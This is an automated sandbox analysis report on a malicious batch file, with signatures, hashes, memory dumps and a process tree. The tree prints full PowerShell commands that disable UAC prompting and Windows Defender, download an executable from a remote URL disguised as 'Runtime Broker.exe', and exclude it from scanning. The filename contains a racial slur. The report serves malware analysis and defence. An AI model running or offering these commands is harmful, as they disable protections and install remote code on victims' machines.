Overview

overview

10

Static

static

1

nigga2.bat

windows7-x64

10

nigga2.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    117s
  • max time network
    117s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    23/03/2025, 22:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    nigga2.bat

  • Size

    1KB

  • MD5

    06aafbdb0650ecee01c1bdb6b7b51fdb

  • SHA1

    ad8c1f0ca620d813ce8e3280139817db583f9c4e

  • SHA256

    3b5953d3ea0420345b5c1e9efdbb88ea80bcaa99f2582834c2cd545efa84880c

  • SHA512

    039a8ca7db486f7c473a07c22c4269c211fc44175d3fb480eeaf5435df23a70151927940b0bf6a7bbc29b12b1d9a84ab5240686e05cc9daae0d54920d2d84fb9

Score
10/10
defense_evasionexecutiontrojan

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
    defense_evasiontrojan
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 31 IoCs
  • Suspicious use of SendNotifyMessage 31 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\nigga2.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2152
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-ExecutionPolicy Unrestricted -Force; Set-ItemProperty -Path 'REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'ConsentPromptBehaviorAdmin' -Value 0; Set-MpPreference -DisableRealtimeMonitoring $true; Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableBlockAtFirstSeen $true; Set-MpPreference -SubmitSamplesConsent 2; Set-Service -Name WinDefend -StartupType Disabled; Stop-Service -Name WinDefend;"
      2⤵
      • UAC bypass
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2092
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest -Uri 'https://github.com/pizq3/dfsdfdfs/releases/download/sex/File.1.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\Local\MyApp\Runtime Broker.exe'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2432
    • C:\Windows\system32\timeout.exe
      timeout /t 2
      2⤵
      • Delays execution with timeout.exe
      PID:2776
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-MpPreference -ExclusionProcess 'C:\Users\Admin\AppData\Roaming\Local\MyApp\Runtime Broker.exe'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3032
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:2944

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CI2LMJIM5N34PY1P45UB.temp
    Filesize

    7KB

    MD5

    1de9dfc2c02b7f3028b9ac732d39518b

    SHA1

    055c6575d90d461bdd64057b3fe580b2e8fb526b

    SHA256

    1180d61286fca322d606c8434d9c06591a7ff355ea1ab4c6657a519c46e46e6a

    SHA512

    6f629cbe470fcd0b9904f607a905d784ee1cab7707b5f709211be9073e3410e65ddddeddd8f0bfcd76db0ca6bd08f8fd5392f8b7102d2480464bd2cb74081ed2

    Download Submit

  • memory/2092-9-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2092-12-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2092-11-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2092-10-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2092-8-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2092-7-0x0000000001E80000-0x0000000001E88000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2092-6-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2092-5-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2092-4-0x000007FEF5D2E000-0x000007FEF5D2F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2432-18-0x000000001B4A0000-0x000000001B782000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2432-19-0x0000000001E80000-0x0000000001E88000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2944-25-0x0000000140000000-0x00000001405E8000-memory.dmp

    Filesize

    5.9MB

    Download

  • memory/2944-26-0x0000000140000000-0x00000001405E8000-memory.dmp

    Filesize

    5.9MB

    Download